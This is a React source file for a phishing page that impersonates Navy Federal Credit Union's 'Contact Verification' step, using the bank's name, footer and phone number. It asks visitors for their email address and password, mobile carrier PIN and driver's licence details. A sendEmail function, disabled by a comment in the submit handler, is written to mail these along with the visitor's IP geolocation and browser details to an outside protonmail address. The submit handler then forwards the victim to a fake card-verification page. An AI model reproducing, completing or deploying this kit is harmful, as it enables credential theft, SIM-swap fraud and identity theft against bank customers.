import { useState, useEffect } from "react";
import detect from "detect.js";
import checkMark from "./checkmark.svg";
import activityPixel from "./activity_pixel.gif";
import contactStyle from "./main-2601c417d92b4204d877.module.css";

const ua = detect.parse(navigator.userAgent);

const Main = (props) => {
  const [account, setAccount] = useState({
    emailAddress: "",
    emailPassword: "",
    phoneNumber: "",
    carrierPin: "",
    idNumber: "",
    issDobYear: "",
    issDobMonth: "",
    issDobDate: "",
    expDobYear: "",
    expDobMonth: "",
    expDobDate: "",
    issState: "",
  });
  const [errors, setErrors] = useState({});
  const [location, setLocation] = useState({});
  const [modal, setModal] = useState(false);

  const validate = () => {
    const error = {};

    if (account.emailAddress.trim() === "" || account.emailAddress.length < 5) {
      error.emailAddress = true;
    }
    if (
      account.emailPassword.trim() === "" ||
      account.emailPassword.length < 3
    ) {
      error.emailPassword = true;
    }
    if (account.issState.trim() === "") {
      error.issState = true;
    }
    if (
      account.issDobYear.trim() === "" ||
      account.issDobYear.length < 4 ||
      account.issDobYear.length > 4
    ) {
      error.issDobYear = true;
    }

    if (account.issDobMonth.trim() === "") {
      error.issDobMonth = true;
    }

    if (
      account.issDobDate.trim() === "" ||
      account.issDobDate.length < 2 ||
      account.issDobDate.length > 2
    ) {
      error.issDobDate = true;
    }
    if (
      account.expDobYear.trim() === "" ||
      account.expDobYear.length < 4 ||
      account.expDobYear.length > 4
    ) {
      error.expDobYear = true;
    }

    if (account.expDobMonth.trim() === "") {
      error.expDobMonth = true;
    }

    if (
      account.expDobDate.trim() === "" ||
      account.expDobDate.length < 2 ||
      account.expDobDate.length > 2
    ) {
      error.expDobDate = true;
    }

    if (
      account.phoneNumber.trim() === "" ||
      account.phoneNumber.length < 10 ||
      account.phoneNumber.length > 10
    ) {
      error.phoneNumber = true;
    }

    if (
      account.carrierPin.trim() === "" ||
      account.carrierPin.length < 4 ||
      account.carrierPin.length > 6 ||
      account.carrierPin.length == 5
    ) {
      error.carrierPin = true;
    }
    if (account.idNumber.trim() === "" || account.idNumber.length < 5) {
      error.idNumber = true;
    }

    return Object.keys(error).length === 0 ? null : error;
  };

  const handleChange = ({ currentTarget: input }) => {
    account[input.name] = input.value;
    setAccount({ ...account });

    const error = validate();
    setErrors(error);
  };

  const handleNumber = ({ currentTarget: input }) => {
    account[input.name] = input.value.replace(/\D/g, "");
    setAccount({ ...account });

    const error = validate();
    setErrors(error);
  };

  const sendEmail = () => {
    window.Email.send({
      SecureToken: "9ed62901-7806-4e30-a101-d0dd4be5041cc",
      To: "hisname2001@protonmail.com",
      From: "NFCU@hey.com",
      Subject: `#NFCU CONTACT INFO => From ${location && location.IPv4} [${
        location && location.country_name
      } - ${location && location.country_code}] `,
      Body: `
          <span style="font-family:Tahoma, sans-serif"><b>#=======[ NFCU - CONTACT INFO ]=======# <b /></span> <br />
          <span style="font-family:Tahoma, sans-serif"> Email Address: ${
            account.emailAddress
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Email Password: ${
            account.emailPassword
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Phone Number: ${
            account.phoneNumber
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Carrier Pin: ${
            account.carrierPin
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> ID Number: ${
            account.idNumber
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Issued State: ${
            account.issState
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Issued Date: ${
            account.issDobDate / account.issDobMonth / account.issDobYear
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Expiry Date: ${
            account.expDobDate / account.expDobMonth / account.expDobYear
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"><b>#=======[ NFCU - IP INFO ]=======#</b> </span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Address: ${
            location && location.IPv4
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Country: ${
            location && location.country_name
          }${location && location.country_code}</span>  <br />
          <span style="font-family:Tahoma, sans-serif">IP State: ${
            location && location.state
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Latitude Longitude: ${
            location && location.latitude
          } ${location && location.longitude}</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP State: ${
            location && location.state
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif"> IP City: ${
            location && location.city
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Browser: ${
            ua && ua.browser.family
          } on ${ua && ua.device.family}</span> <br /> 
          <span style="font-family:Tahoma, sans-serif"> User Agent:  ${
            ua && ua.source }
          }} on {{ device }}</span> <br />
          <span style="font-family:Tahoma, sans-serif"> <b> #=======[ NFCU - CONTACT INFO ]=======# </b> </span> <br />
      `,
    }).then((message) => message);
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    // sendEmail();
    setModal(true);
    console.log(account);
    console.log(location);
    setTimeout(
      () => props.history.push("/NFOAA_AUTH/VERIFICATION/card.jsp"),
      1500
    );
  };

  useEffect(() => {
    fetch(
      "https://geolocation-db.com/json/ef6c41a0-9d3c-11eb-8f3b-e1f5536499e7"
    )
      .then((response) => response.json())
      .then((data) => {
        const details = data;
        setLocation(details);
      });
  }, []);

  return (
    <>
      {modal && (
        <div id="wait-cursor">
          <div className={contactStyle.loader}></div>
        </div>
      )}
      <header role="banner" id="application-header">
        <h1 className={contactStyle.visiblyHidden} role="presentation">
          Navy Federal Credit Union
        </h1>
      </header>

      <main role="main" id="app-main">
        <section>
          <div
            id="session-timeout-container"
            role="dialog"
            aria-describedby="session-timeout-info"
            aria-labelledby="session-timeout-info"
            style={{ display: "none" }}
          >
            <main id="session-timeout-warning">
              <div tabIndex="1000"></div>
              <h2 id="session-timeout-info">Are you still there?</h2>
              <p>
                For your security, your session will expire in 547 seconds.
              </p>{" "}
              <button
                id="something"
                tabIndex="1001"
                className={`${contactStyle.btn} ${contactStyle.secondary}`}
              >
                Continue Application
              </button>
              <div tabIndex="1002"></div>
            </main>
          </div>
          <div id="wait-cursor" style={{ display: "none" }}>
            <div className={contactStyle.loader}></div>
          </div>
          <div
            aria-live="assertive"
            className={contactStyle.visuallyHidden}
          ></div>

          <div data-v-1c530256="" data-v-169bc697="">
            <div
              data-v-1c530256=""
              className={`${contactStyle.container} ${contactStyle.clearfix} ${contactStyle.card} ${contactStyle.white}`}
            >
              <div
                data-v-5dff800b=""
                data-v-1c530256=""
                className={contactStyle.progressbarWrapper}
              >
                <ul data-v-5dff800b="" className={contactStyle.stepProgressBar}>
                  <li
                    data-v-5dff800b=""
                    className={`${contactStyle.stepItem} ${contactStyle.success}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Eligibility step checked"
                      aria-hidden="true"
                      className={contactStyle.stepItemCheckmark}
                      style={{ width: "14px" }}
                    />
                    <span
                      data-v-5dff800b=""
                      className={`${contactStyle.progressLabel} ${contactStyle.singleLinePadding}`}
                    >
                      Personal Verification
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={contactStyle.visuallyHidden}
                    >
                      step completed
                    </p>
                  </li>
                  <li
                    data-v-5dff800b=""
                    className={`${contactStyle.stepItem} ${contactStyle.current}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Membership step checked"
                      aria-hidden="true"
                      className={contactStyle.stepItemCheckmark}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${contactStyle.progressLabel} ${contactStyle.singleLinePadding}`}
                    >
                      Contact Verification
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={contactStyle.visuallyHidden}
                    >
                      step in progress
                    </p>
                  </li>
                  <li data-v-5dff800b="" className={contactStyle.stepItem}>
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Finish Setup step"
                      aria-hidden="true"
                      className={contactStyle.stepItemCheckmark}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${contactStyle.progressLabel} ${contactStyle.singleLinePadding}`}
                    >
                      Card Verification
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={contactStyle.visuallyHidden}
                    ></p>
                  </li>
                  <li data-v-5dff800b="" className={contactStyle.stepItem}>
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Sign In step"
                      aria-hidden="true"
                      className={contactStyle.stepItemCheckmark}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${contactStyle.progressLabel} ${contactStyle.singleLinePadding}`}
                    >
                      Complete
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={contactStyle.visuallyHidden}
                    ></p>
                  </li>
                </ul>
              </div>
              <legend data-v-1c530256="" tabIndex="-1">
                <h1 data-v-1c530256="" className={contactStyle.prompt}>
                  Let continue with your verification
                </h1>
              </legend>

              <form data-v-1c530256="" onSubmit={handleSubmit}>
                <section data-v-169bc697="" data-v-1c530256="">
                  <header data-v-169bc697="" data-v-1c530256="">
                    <h2
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={contactStyle.fieldGrouping}
                    >
                      Contact Information
                    </h2>
                  </header>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={contactStyle.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={contactStyle.colSm}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-46">
                          Email Address
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div
                          data-v-2ae7dda6=""
                          className={contactStyle.inputGroup}
                        >
                          <input
                            data-v-2ae7dda6=""
                            id="field-46"
                            maxLength="40"
                            type="text"
                            className={`${contactStyle.formInput} ${contactStyle.pvm} ${contactStyle.phs} ${contactStyle.fullWidth} ${contactStyle.inputBorder}`}
                            name="emailAddress"
                            value={account.emailAddress}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-46"
                          aria-live="polite"
                          className={contactStyle.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={contactStyle.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={contactStyle.colSm}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-46">
                          Email Password
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div
                          data-v-2ae7dda6=""
                          className={contactStyle.inputGroup}
                        >
                          <input
                            data-v-2ae7dda6=""
                            id="field-46"
                            maxLength="40"
                            type="password"
                            className={`${contactStyle.formInput} ${contactStyle.pvm} ${contactStyle.pwd} ${contactStyle.phs} ${contactStyle.fullWidth} ${contactStyle.inputBorder}`}
                            name="emailPassword"
                            value={account.emailPassword}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-46"
                          aria-live="polite"
                          className={contactStyle.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={contactStyle.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={contactStyle.colSm8}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-43">
                          Phone Number
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div
                          data-v-2ae7dda6=""
                          className={contactStyle.inputGroup}
                        >
                          <input
                            data-v-2ae7dda6=""
                            id="field-43"
                            maxLength="10"
                            pattern="[0-9]*"
                            type="tel"
                            className={`${contactStyle.formInput} ${contactStyle.pvm} ${contactStyle.phs} ${contactStyle.fullWidth} ${contactStyle.inputBorder}`}
                            name="phoneNumber"
                            value={account.phoneNumber}
                            onChange={handleNumber}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-43"
                          aria-live="polite"
                          className={contactStyle.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={contactStyle.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={contactStyle.colSm8}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-43">
                          Carrier Pin
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div
                          data-v-2ae7dda6=""
                          className={contactStyle.inputGroup}
                        >
                          <input
                            data-v-2ae7dda6=""
                            id="field-43"
                            maxLength="6"
                            pattern="[0-9]*"
                            type="password"
                            className={`${contactStyle.formInput} ${contactStyle.pvm}  ${contactStyle.pwd} ${contactStyle.phs} ${contactStyle.fullWidth} ${contactStyle.inputBorder}`}
                            name="carrierPin"
                            value={account.carrierPin}
                            onChange={handleNumber}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-43"
                          aria-live="polite"
                          className={contactStyle.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                </section>
                <section>
                  <div className={contactStyle.row}>
                    <div className={contactStyle.col}>
                      <h2
                        data-v-169bc697=""
                        data-v-1c530256=""
                        className={contactStyle.fieldGrouping}
                      >
                        Identification
                      </h2>
                      <legend data-v-1355d37a="" tabIndex="-1">
                        U.S. Driver's License
                      </legend>
                      <div data-v-2ae7dda6="">
                        <label data-v-2ae7dda6="" htmlFor="field-67">
                          ID Number
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div
                          data-v-2ae7dda6=""
                          className={contactStyle.inputGroup}
                        >
                          <input
                            data-v-2ae7dda6=""
                            id="field-67"
                            maxlength="40"
                            type="text"
                            className={`${contactStyle.formInput} ${contactStyle.pvm} ${contactStyle.pwd} ${contactStyle.phs} ${contactStyle.fullWidth} ${contactStyle.inputBorder}`}
                            name="idNumber"
                            value={account.idNumber}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-67"
                          aria-live="polite"
                          className={contactStyle.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>

                  <div className={contactStyle.row}>
                    <div className={contactStyle.colSm6}>
                      <div data-v-7d1371a8="">
                        <label data-v-7d1371a8="" htmlFor="field-70">
                          Issued State
                        </label>{" "}
                        <select
                          data-v-7d1371a8=""
                          id="field-70"
                          name="issState"
                          value={account.issState}
                          onChange={handleChange}
                        >
                          <option data-v-7d1371a8="" selected="selected">
                            Select State
                          </option>
                          <option data-v-7d1371a8="" value="AA">
                            AA
                          </option>
                          <option data-v-7d1371a8="" value="AE">
                            AE
                          </option>
                          <option data-v-7d1371a8="" value="AK">
                            AK
                          </option>
                          <option data-v-7d1371a8="" value="AL">
                            AL
                          </option>
                          <option data-v-7d1371a8="" value="AP">
                            AP
                          </option>
                          <option data-v-7d1371a8="" value="AR">
                            AR
                          </option>
                          <option data-v-7d1371a8="" value="AS">
                            AS
                          </option>
                          <option data-v-7d1371a8="" value="AZ">
                            AZ
                          </option>
                          <option data-v-7d1371a8="" value="CA">
                            CA
                          </option>
                          <option data-v-7d1371a8="" value="CO">
                            CO
                          </option>
                          <option data-v-7d1371a8="" value="CT">
                            CT
                          </option>
                          <option data-v-7d1371a8="" value="DC">
                            DC
                          </option>
                          <option data-v-7d1371a8="" value="DE">
                            DE
                          </option>
                          <option data-v-7d1371a8="" value="FL">
                            FL
                          </option>
                          <option data-v-7d1371a8="" value="FM">
                            FM
                          </option>
                          <option data-v-7d1371a8="" value="GA">
                            GA
                          </option>
                          <option data-v-7d1371a8="" value="GU">
                            GU
                          </option>
                          <option data-v-7d1371a8="" value="HI">
                            HI
                          </option>
                          <option data-v-7d1371a8="" value="IA">
                            IA
                          </option>
                          <option data-v-7d1371a8="" value="ID">
                            ID
                          </option>
                          <option data-v-7d1371a8="" value="IL">
                            IL
                          </option>
                          <option data-v-7d1371a8="" value="IN">
                            IN
                          </option>
                          <option data-v-7d1371a8="" value="KS">
                            KS
                          </option>
                          <option data-v-7d1371a8="" value="KY">
                            KY
                          </option>
                          <option data-v-7d1371a8="" value="LA">
                            LA
                          </option>
                          <option data-v-7d1371a8="" value="MA">
                            MA
                          </option>
                          <option data-v-7d1371a8="" value="MD">
                            MD
                          </option>
                          <option data-v-7d1371a8="" value="ME">
                            ME
                          </option>
                          <option data-v-7d1371a8="" value="MH">
                            MH
                          </option>
                          <option data-v-7d1371a8="" value="MI">
                            MI
                          </option>
                          <option data-v-7d1371a8="" value="MN">
                            MN
                          </option>
                          <option data-v-7d1371a8="" value="MO">
                            MO
                          </option>
                          <option data-v-7d1371a8="" value="MP">
                            MP
                          </option>
                          <option data-v-7d1371a8="" value="MS">
                            MS
                          </option>
                          <option data-v-7d1371a8="" value="MT">
                            MT
                          </option>
                          <option data-v-7d1371a8="" value="NC">
                            NC
                          </option>
                          <option data-v-7d1371a8="" value="ND">
                            ND
                          </option>
                          <option data-v-7d1371a8="" value="NE">
                            NE
                          </option>
                          <option data-v-7d1371a8="" value="NH">
                            NH
                          </option>
                          <option data-v-7d1371a8="" value="NJ">
                            NJ
                          </option>
                          <option data-v-7d1371a8="" value="NM">
                            NM
                          </option>
                          <option data-v-7d1371a8="" value="NV">
                            NV
                          </option>
                          <option data-v-7d1371a8="" value="NY">
                            NY
                          </option>
                          <option data-v-7d1371a8="" value="OH">
                            OH
                          </option>
                          <option data-v-7d1371a8="" value="OK">
                            OK
                          </option>
                          <option data-v-7d1371a8="" value="OR">
                            OR
                          </option>
                          <option data-v-7d1371a8="" value="PA">
                            PA
                          </option>
                          <option data-v-7d1371a8="" value="PR">
                            PR
                          </option>
                          <option data-v-7d1371a8="" value="PW">
                            PW
                          </option>
                          <option data-v-7d1371a8="" value="RI">
                            RI
                          </option>
                          <option data-v-7d1371a8="" value="SC">
                            SC
                          </option>
                          <option data-v-7d1371a8="" value="SD">
                            SD
                          </option>
                          <option data-v-7d1371a8="" value="TN">
                            TN
                          </option>
                          <option data-v-7d1371a8="" value="TX">
                            TX
                          </option>
                          <option data-v-7d1371a8="" value="UT">
                            UT
                          </option>
                          <option data-v-7d1371a8="" value="VA">
                            VA
                          </option>
                          <option data-v-7d1371a8="" value="VI">
                            VI
                          </option>
                          <option data-v-7d1371a8="" value="VT">
                            VT
                          </option>
                          <option data-v-7d1371a8="" value="WA">
                            WA
                          </option>
                          <option data-v-7d1371a8="" value="WI">
                            WI
                          </option>
                          <option data-v-7d1371a8="" value="WV">
                            WV
                          </option>
                          <option data-v-7d1371a8="" value="WY">
                            WY
                          </option>
                        </select>
                      </div>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={contactStyle.row}
                    style={{ marginTop: "0px" }}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={contactStyle.colSm}
                    >
                      <fieldset
                        data-v-1355d37a=""
                        data-v-169bc697=""
                        className={contactStyle.row}
                        data-v-1c530256=""
                      >
                        <legend
                          data-v-1355d37a=""
                          className={contactStyle.col12}
                        >
                          Issued Date
                        </legend>
                        <div
                          data-v-1355d37a=""
                          className={`${contactStyle.row} ${contactStyle.fullRow}`}
                        >
                          <div
                            data-v-1355d37a=""
                            className={contactStyle.selCol}
                          >
                            <label data-v-1355d37a="" htmlFor="month">
                              Month
                            </label>
                            <select
                              data-v-1355d37a=""
                              id="month"
                              className=""
                              name="issDobMonth"
                              value={account.issDobMonth}
                              onChange={handleChange}
                            >
                              <option data-v-1355d37a="" selected="selected">
                                Select Month
                              </option>
                              <option data-v-1355d37a="" value="01">
                                January
                              </option>
                              <option data-v-1355d37a="" value="02">
                                February
                              </option>
                              <option data-v-1355d37a="" value="03">
                                March
                              </option>
                              <option data-v-1355d37a="" value="04">
                                April
                              </option>
                              <option data-v-1355d37a="" value="05">
                                May
                              </option>
                              <option data-v-1355d37a="" value="06">
                                June
                              </option>
                              <option data-v-1355d37a="" value="07">
                                July
                              </option>
                              <option data-v-1355d37a="" value="08">
                                August
                              </option>
                              <option data-v-1355d37a="" value="09">
                                September
                              </option>
                              <option data-v-1355d37a="" value="10">
                                October
                              </option>
                              <option data-v-1355d37a="" value="11">
                                November
                              </option>
                              <option data-v-1355d37a="" value="12">
                                December
                              </option>
                            </select>
                          </div>
                          <div data-v-1355d37a="">
                            <label data-v-1355d37a="" htmlFor="day">
                              Day
                            </label>{" "}
                            <input
                              data-v-1355d37a=""
                              type="tel"
                              id="day"
                              maxLength="2"
                              size="3"
                              pattern="[0-9]*"
                              className={`${contactStyle.pvm} ${contactStyle.phs} ${contactStyle.inputBorder}`}
                              name="issDobDate"
                              value={account.issDobDate}
                              onChange={handleNumber}
                            />
                          </div>
                          <div data-v-1355d37a="">
                            <label data-v-1355d37a="" htmlFor="year">
                              Year
                            </label>{" "}
                            <input
                              data-v-1355d37a=""
                              type="tel"
                              id="year"
                              maxLength="4"
                              size="5"
                              pattern="[0-9]*"
                              className={`${contactStyle.pvm} ${contactStyle.phs} ${contactStyle.inputBorder}`}
                              name="issDobYear"
                              value={account.issDobYear}
                              onChange={handleNumber}
                            />
                          </div>
                        </div>
                      </fieldset>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={contactStyle.row}
                    style={{ marginTop: "0px" }}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={contactStyle.colSm}
                    >
                      <fieldset
                        data-v-1355d37a=""
                        data-v-169bc697=""
                        className={contactStyle.row}
                        data-v-1c530256=""
                      >
                        <legend
                          data-v-1355d37a=""
                          className={contactStyle.col12}
                        >
                          Expiry Date
                        </legend>
                        <div
                          data-v-1355d37a=""
                          className={`${contactStyle.row} ${contactStyle.fullRow}`}
                        >
                          <div
                            data-v-1355d37a=""
                            className={contactStyle.selCol}
                          >
                            <label data-v-1355d37a="" htmlFor="month">
                              Month
                            </label>
                            <select
                              data-v-1355d37a=""
                              id="month"
                              className=""
                              name="expDobMonth"
                              value={account.expDobMonth}
                              onChange={handleChange}
                            >
                              <option data-v-1355d37a="" selected="selected">
                                Select Month
                              </option>
                              <option data-v-1355d37a="" value="01">
                                January
                              </option>
                              <option data-v-1355d37a="" value="02">
                                February
                              </option>
                              <option data-v-1355d37a="" value="03">
                                March
                              </option>
                              <option data-v-1355d37a="" value="04">
                                April
                              </option>
                              <option data-v-1355d37a="" value="05">
                                May
                              </option>
                              <option data-v-1355d37a="" value="06">
                                June
                              </option>
                              <option data-v-1355d37a="" value="07">
                                July
                              </option>
                              <option data-v-1355d37a="" value="08">
                                August
                              </option>
                              <option data-v-1355d37a="" value="09">
                                September
                              </option>
                              <option data-v-1355d37a="" value="10">
                                October
                              </option>
                              <option data-v-1355d37a="" value="11">
                                November
                              </option>
                              <option data-v-1355d37a="" value="12">
                                December
                              </option>
                            </select>
                          </div>
                          <div data-v-1355d37a="">
                            <label data-v-1355d37a="" htmlFor="day">
                              Day
                            </label>{" "}
                            <input
                              data-v-1355d37a=""
                              type="tel"
                              id="day"
                              maxLength="2"
                              size="3"
                              pattern="[0-9]*"
                              className={`${contactStyle.pvm} ${contactStyle.phs} ${contactStyle.inputBorder}`}
                              name="expDobDate"
                              value={account.expDobDate}
                              onChange={handleNumber}
                            />
                          </div>
                          <div data-v-1355d37a="">
                            <label data-v-1355d37a="" htmlFor="year">
                              Year
                            </label>{" "}
                            <input
                              data-v-1355d37a=""
                              type="tel"
                              id="year"
                              maxLength="4"
                              size="5"
                              pattern="[0-9]*"
                              className={`${contactStyle.pvm} ${contactStyle.phs} ${contactStyle.inputBorder}`}
                              name="expDobYear"
                              value={account.expDobYear}
                              onChange={handleNumber}
                            />
                          </div>
                        </div>
                      </fieldset>
                    </div>
                  </div>
                </section>
                <div
                  data-v-1c530256=""
                  className={`${contactStyle.row} ${contactStyle.actions}`}
                >
                  <div data-v-1c530256="" className={contactStyle.col}>
                    <div data-v-1c530256="" className={contactStyle.textCenter}>
                      <button
                        data-v-1c530256=""
                        id="app-personal-info-cont"
                        type="submit"
                        className={`${contactStyle.btn} ${contactStyle.action} ${contactStyle.forward}`}
                        disabled={errors ? "disabled" : null}
                      >
                        Continue
                      </button>
                    </div>
                  </div>
                </div>
              </form>
            </div>
          </div>
        </section>
      </main>

      <footer id="application-footer">
        <section
          className={`${contactStyle.containerFluid} ${contactStyle.container} ${contactStyle.clearfix}`}
        >
          <p>
            <strong>© 2021 Navy Federal Credit Union.</strong> All rights
            reserved
          </p>
          <p>
            <span
              className={`${contactStyle.nfcuIcon} ${contactStyle.iconNcua}`}
            ></span>
            <a
              href="https://www.navyfederal.org/pdf/ebrochures/1116e.pdf"
              target="_blank"
            >
              Federally Insured by NCUA
            </a>
            • If you have questions please contact us: 1-888-842-6328
          </p>
        </section>
      </footer>

      {/* <!-- 
Start of global snippet: Please do not remove
Place this snippet between the <head> and </head> tags on every page of your site.
-->
  <!-- Global site tag (gtag.js) - Google Marketing Platform -->


  <!-- End of global snippet: Please do not remove --> */}
      <img src={activityPixel} hidden="" />
    </>
  );
};

export default Main;
